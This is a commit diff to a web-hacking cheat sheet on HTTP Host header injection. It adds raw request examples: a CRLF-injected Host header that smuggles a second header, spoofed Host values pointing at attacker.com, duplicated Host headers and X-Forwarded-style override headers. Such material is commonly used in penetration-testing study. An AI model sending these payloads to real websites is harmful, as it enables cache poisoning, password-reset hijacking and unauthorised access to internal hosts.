vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update Host Header Injection.md

Browse Source
This commit is contained in:
Mehdi 2024-09-30 10:46:08 +03:30 committed by GitHub
parent 573ea30c12
commit 2d16f74307
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 15 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
Host Header Injection.md
View File

@ -9,13 +9,25 @@ HTTP Host header attacks exploit vulnerable websites that handle the value of th
* Allow access to virtual hosts that were not intended to be externally accessible.
## How to exploit
* Change the host header
* Send a request with a malicious Host header value
```html
GET /index.html HTTP/1.1
Host: www.example.com%0d%0aX-Forwarded-For: 192.168.1.1
...
```
* Send a request with a spoofed Host header value
```html
GET /index.html HTTP/1.1
Host: www.example.com.attacker.com
...
```
* Change the Host header
```html
GET /example HTTP/1.1
Host: attacker.com
...
```
* Duplicating the host header
* Duplicating the Host header
```html
GET /example HTTP/1.1
Host: vulnerable-website.com
@ -39,7 +51,7 @@ X-Remote-Addr: attacker.com
X-Host: attacker.com
Forwarded: attacker.com
# How to use? In this case im using "X-Forwarded-For : attacker.com"
# How to use? In this case I using "X-Forwarded-For : attacker.com"
GET /example HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For : attacker.com
@ -50,9 +62,3 @@ GET https://vulnerable-website.com/ HTTP/1.1
Host: attacker.com
...
```